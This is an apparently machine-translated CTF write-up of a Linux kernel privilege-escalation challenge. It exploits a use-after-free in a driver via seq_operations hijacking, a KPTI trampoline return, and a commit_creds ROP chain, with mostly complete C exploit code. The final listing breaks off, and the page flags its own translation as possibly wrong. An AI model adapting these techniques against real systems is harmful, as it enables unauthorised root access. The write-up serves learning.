Exploit on Kernel PWN Topic: The First Attempt

March 18, 2023 · 10 min read

MuelNova

Pwner who wants to write codes.

Attachment to the topic: http://121.40.89.206/20230311/kheap_9010ffcba2dfbfd58c7ab541015b24ec.zip

Although I've studied the kernel a bit, this is the first attempt at a kernel PWN challenge.

Preliminary Knowledge

Before understanding the exploit, let's take a look at what we need.

seq_file

Source at seq_file.c - fs/seq_file.c - Linux source code (v5.11) - Bootlin

When open("/proc/self/stat", 0); is executed in user space, the kernel calls the single_open() function, where it allocates a memory space of size 0x20 for the seq_operations structure.

int single_open(struct file *file, int (*show)(struct seq_file *, void *),
		void *data)
{
	struct seq_operations *op = kmalloc(sizeof(*op), GFP_KERNEL_ACCOUNT);
	int res = -ENOMEM;

	if (op) {
		op->start = single_start;
		op->next = single_next;
		op->stop = single_stop;
		op->show = show;
		res = seq_open(file, op);
		if (!res)
			((struct seq_file *)file->private_data)->private = data;
		else
			kfree(op);
	}
	return res;
}
EXPORT_SYMBOL(single_open);

The seq_operations structure is defined as follows:

struct seq_operations {
	void * (*start) (struct seq_file *m, loff_t *pos);
	void (*stop) (struct seq_file *m, void *v);
	void * (*next) (struct seq_file *m, void *v, loff_t *pos);
	int (*show) (struct seq_file *m, void *v);
};

The open() function returns a file descriptor fd, and when a read operation is performed on this file descriptor, it will ultimately call the function pointed to by seq_operations->start.

Note

In addition to seq_operations->start, the read(fd, BUF, size) call also invokes the function pointed to by seq_operations->stop pointer. You can find more information about this in seq_file.c - fs/seq_file.c - Linux source code (v5.11) - Bootlin.

In summary, we can observe three things:

seq_operations is a 0x20-sized structure that is allocated when open("/proc/self/stat", 0); is called.
seq_operations calls seq_operations->start when read is executed.
By default, seq_operations contains 4 function pointers that reside in the kernel.

Therefore, if there is a 0x20-sized heap block on the kernel that we can modify, when we call open("/proc/self/stat",0);, seq_operations will be allocated to the heap block we control. At this point, we can leak the kernel address and control the program flow by modifying the start pointer.

KPTI

KPTI (Kernel PageTable Isolation) is a mitigation technique for preventing page table leaks by completely separating user space and kernel space page tables.

In KPTI, each process has two sets of page tables - one for kernel mode and one for user mode (two address spaces). The kernel mode page tables can only be accessed in kernel mode, and can establish mappings to the kernel and user spaces (though user space is protected by SMAP and SMEP). The user mode page tables only include user space. However, due to context switching, the user mode page tables must include some kernel addresses for establishing mappings to interrupt entry and exit points.

When an interrupt occurs in user mode, switching the CR3 register from the user mode address space to the kernel mode address space is necessary. The interrupt top half requires speed, so does the CR3 switch operation. In order to achieve this goal, KPTI places the kernel space PGD and user space PGD consecutively in an 8KB memory space (kernel mode in the low part and user mode in the high part). This space must be 8KB aligned, which converts the CR3 switch operation to setting or clearing the 13th bit of CR3, thereby increasing the speed of CR3 switching.

Through the above introduction, we know that to bypass KPTI, we only need to set bit 13 of CR3 to 1 to switch from the kernel mode PGD back to the user mode PGD.

And at swapgs_restore_regs_and_return_to_usermode+0x16, this can be easily done:

.text:FFFFFFFF81600A34 41 5F                          pop     r15
.text:FFFFFFFF81600A36 41 5E                          pop     r14
.text:FFFFFFFF81600A38 41 5D                          pop     r13
.text:FFFFFFFF81600A3A 41 5C                          pop     r12
.text:FFFFFFFF81600A3C 5D                             pop     rbp
.text:FFFFFFFF81600A3D 5B                             pop     rbx
.text:FFFFFFFF81600A3E 41 5B                          pop     r11
.text:FFFFFFFF81600A40 41 5A                          pop     r10
.text:FFFFFFFF81600A42 41 59                          pop     r9
.text:FFFFFFFF81600A44 41 58                          pop     r8
.text:FFFFFFFF81600A46 58                             pop     rax
.text:FFFFFFFF81600A47 59                             pop     rcx
.text:FFFFFFFF81600A48 5A                             pop     rdx
.text:FFFFFFFF81600A49 5E                             pop     rsi
.text:FFFFFFFF81600A4A 48 89 E7                       mov     rdi, rsp
.text:FFFFFFFF81600A4D 65 48 8B 24 25+                mov     rsp, gs: 0x5004
.text:FFFFFFFF81600A56 FF 77 30                       push    qword ptr [rdi+30h]
.text:FFFFFFFF81600A59 FF 77 28                       push    qword ptr [rdi+28h]
.text:FFFFFFFF81600A5C FF 77 20                       push    qword ptr [rdi+20h]
.text:FFFFFFFF81600A5F FF 77 18                       push    qword ptr [rdi+18h]
.text:FFFFFFFF81600A62 FF 77 10                       push    qword ptr [rdi+10h]
.text:FFFFFFFF81600A65 FF 37                          push    qword ptr [rdi]
.text:FFFFFFFF81600A67 50                             push    rax
.text:FFFFFFFF81600A68 EB 43                          nop
.text:FFFFFFFF81600A6A 0F 20 DF                       mov     rdi, cr3
.text:FFFFFFFF81600A6D EB 34                          jmp     0xFFFFFFFF81600AA3

.text:FFFFFFFF81600AA3 48 81 CF 00 10+                or      rdi, 1000h
.text:FFFFFFFF81600AAA 0F 22 DF                       mov     cr3, rdi
.text:FFFFFFFF81600AAD 58                             pop     rax
.text:FFFFFFFF81600AAE 5F                             pop     rdi
.text:FFFFFFFF81600AAF FF 15 23 65 62+                call    cs: SWAPGS
.text:FFFFFFFF81600AB5 FF 25 15 65 62+                jmp     cs: INTERRUPT_RETURN

_SWAPGS
.text:FFFFFFFF8103EFC0 55                             push    rbp
.text:FFFFFFFF8103EFC1 48 89 E5                       mov     rbp, rsp
.text:FFFFFFFF8103EFC4 0F 01 F8                       swapgs
.text:FFFFFFFF8103EFC7 5D                             pop     rbp
.text:FFFFFFFF8103EFC8 C3

With this configuration, we can prepare the stack as follows to jump to userland to execute our user space code:

rsp  ---->  mov_rdi_rsp
            0
            0
            rip
            cs
            rflags
            rsp
            ss

Why is the stack constructed like this?

We can refer to the description of the IRET instruction in the manual:

The IRET instruction pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure. If the return is to another privilege level, the IRET instruction also pops the stack pointer and SS from the stack before resuming program execution. If the return is to virtual-8086 mode, the processor also pops the data segment registers from the stack.

Topic Analysis

Handling Topic Files

bzImage:

vmlinux-extract-elf bzImage vmlinux

rootfs.cpio

mkdir fs
cp rootfs.cpio fs/rootfs.cpio.gz
cd fs
gunzip rootfs.cpio.gz
cpio -idmv < rootfs.cpio

Modify the init file to change it to the root user for easy debugging.

#!/bin/sh

mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev

exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

insmod /lib/module/kheap.ko
chmod 666 /dev/kheap
chmod 600 flag

setsid cttyhack setuidgid 0000 sh

umount /proc
umount /sys

poweroff -d 0  -f

As shown in start.sh, we need to escalate privileges to view the flag, and protections such as SMAP and KASLR are enabled.

Driver Analysis

Located at fs/lib/module/kheap.ko

ioctl

Here, request corresponds to the arg we pass in, but for some reason, IDA did not resolve it.

Further down, based on the cmd, the creation and release of heap blocks and the selection of heap blocks are decided, making it easy for us to read and write to heap blocks.

Here, we note that if we perform operation 0x10002 where we assign the select global variable the address of the heap block, and then perform operation 0x10001 to release the heap block, the select pointer is not set to 0, giving us a dangling pointer that we can read and write to.

write

We can write at most 0x20 bytes to the select pointer.

read

We can read a maximum of 0x20 bytes from the select pointer, which allows us to leak kernel addresses.

Writing the Exploit

Exploit writing is difficult because of transitioning from Python and weak typing to C. Let's add some comments due to the first analysis of a kernel challenge.

Firstly, we need to save the user state to restore the context when switching from kernel mode back to user mode.

uint64_t user_cs, user_ss, user_eflag, user_rsp;

void save_state()
{
  asm(
    "movq %%cs, %0;"
    "movq %%ss, %1;"
    "movq %%rsp, %3;"
    "pushfq;"
    "pop %2;"
    : "=r"(user_cs), "=r"(user_ss), "=r"(user_eflag), "=r"(user_rsp)
    :
    : "memory"
  );
}

Next, we define the necessary structures. Here, let's define the info structure corresponding to the pointer arguments in ioctl.

struct info
{
  uint64_t idx;
  char *ptr;
};

Subsequently, by wrapping the ioctl function, we abstract several functionalities implemented for easy invocation.

int dev_fd;
int seq_fd;

void new(uint64_t idx)
{
  struct info arg = {idx, NULL};
  ioctl(dev_fd, 0x10000, &arg);
}

void delete(uint64_t idx)
{
  struct info arg = {idx, NULL};
  ioctl(dev_fd, 0x10001, &arg);
}

void choose(uint64_t idx)
{
  struct info arg = {idx, NULL};
  ioctl(dev_fd, 0x10002, &arg);
}

int seq_open()
{
  int seq;
  if ((seq = open("/proc/self/stat", O_RDONLY)) == -1)
  {
    puts("[X] Seq Open Error");
    exit(0);
  }
  return seq;
}

void get_shell()
{
  system("/bin/sh");
  exit(0);
}

Now we can start writing the exploit.

Firstly, we create a dangling pointer with idx=0.

int main()
{
  save_state();

  dev_fd = open("/dev/kheap", O_RDWR); // Kheap Device FD
  if (dev_fd < 0)
  {
    puts("[X] Device Open Error");
    exit(0);
  }

  new(0);
  choose(0);
  delete(0);
}

As per the preliminary knowledge, we can leverage open("/proc/self/stat", 0); to allocate the seq_operations structure to the heap block we control. Subsequently, using read, we can read all the contents of the seq_operations structure and calculate the kernel base address. With the kernel base address, we can access other necessary function addresses.

  seq_fd = seq_open(); // seq_operations <--> 0

  uint64_t *recv = malloc(0x20);
  read(dev_fd, (char *)recv, 0x20); // leak kernel address

  uint64_t kernel_base = recv[0] - 0x33F980;
  uint64_t prepare_kernel_cred = kernel_base + 0xcebf0;
  uint64_t commit_creds = kernel_base + 0xce710;
  uint64_t kpti_trampoline = kernel_base + 0xc00fb0;
  uint64_t seq_read = kernel_base + 0x340560;
  uint64_t pop_rdi = kernel_base + 0x2517a;
  uint64_t mov_rdi_rax = kernel_base + 0x5982f4;
  uint64_t gadget = kernel_base + 0x94a10;

Finally, we start setting up the ROP chain.

Using the xchg eax, esp gadget in the kernel, we move the stack to a location in user space where the low 32 bits of the address are the same. We just need to lay our gadgets there in advance to achieve privilege escalation.

  uint64_t *mmap_addr = mmap((void *)(gadget & 0xFFFFF000), PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANONYMOUS | MAP_SHARED, -1, 0);
  printf("[+] mmap_addr: 0x%lx\n", (uint64_t)mmap_addr);

  uint64_t *ROP = (uint64_t *)(((char *)mmap_addr) + 0xa10), i = 0;  // ROP Address <--> low 32bit of gadget in kernel
  *(ROP + i++) = pop_rdi;
  *(ROP + i++) = 0;
  *(ROP + i++) = prepare_kernel_cred;  // After this, we don't need to use gadget `mov rdi, rax`, it's already set.
  *(ROP + i++) = commit_creds;
  *(ROP + i++) = kpti_trampoline + 22;  // Prepare for SWAPGS
  *(ROP + i++) = 0;
  *(ROP + i++) = 0;
  *(ROP + i++) = (uint64_t)get_shell;  // rip
  *(ROP + i++) = user_cs;  // cs
  *(ROP + i++) = user_eflag;  // eflag
  *(ROP + i++) = user_rsp;  // rsp
  *(ROP + i++) = user_ss;  // ss

  uint64_t *buf = malloc(0x20);
  memcpy(buf, recv, 0x20);
  buf[0] = (uint64_t)gadget;
  write(dev_fd, (char *)buf, 0x20);
  read(seq_fd, NULL, 1);

Final Exploit:

// gcc --static exp.c -o exp

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <assert.h>
#include <signal.h>
#include <unistd.h>
#include <syscall.h>
#include <pthread.h>
#include <poll.h>
#include <linux/userfaultfd.h>
#include <linux/fs.h>
#include <sys/shm.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/syscall.h>

#define PAGE_SIZE 0x1000

struct info
{
  uint64_t idx;
  char *ptr;
};


int dev_fd;
uint64_t user_cs, user_ss, user_eflag, user_rsp;

void save_state()
{
  asm(
    "movq %%cs, %0;"
    "movq %%ss, %1;"
    "movq %%rsp, %3;"
    "pushfq;"
    "pop %2;"
    : "=r"(user_cs), "=r"(user_ss), "=r"(user_eflag), "=r"(user_rsp)
    :
    :
:::info
This Content is generated by LLM and might be wrong / incomplete, refer to Chinese version if you find something wrong.
:::
<!-- AI -->

Preliminary Knowledge​

seq_file​

KPTI​

Topic Analysis​

Handling Topic Files​

Driver Analysis​

ioctl​

write​

read​

Writing the Exploit​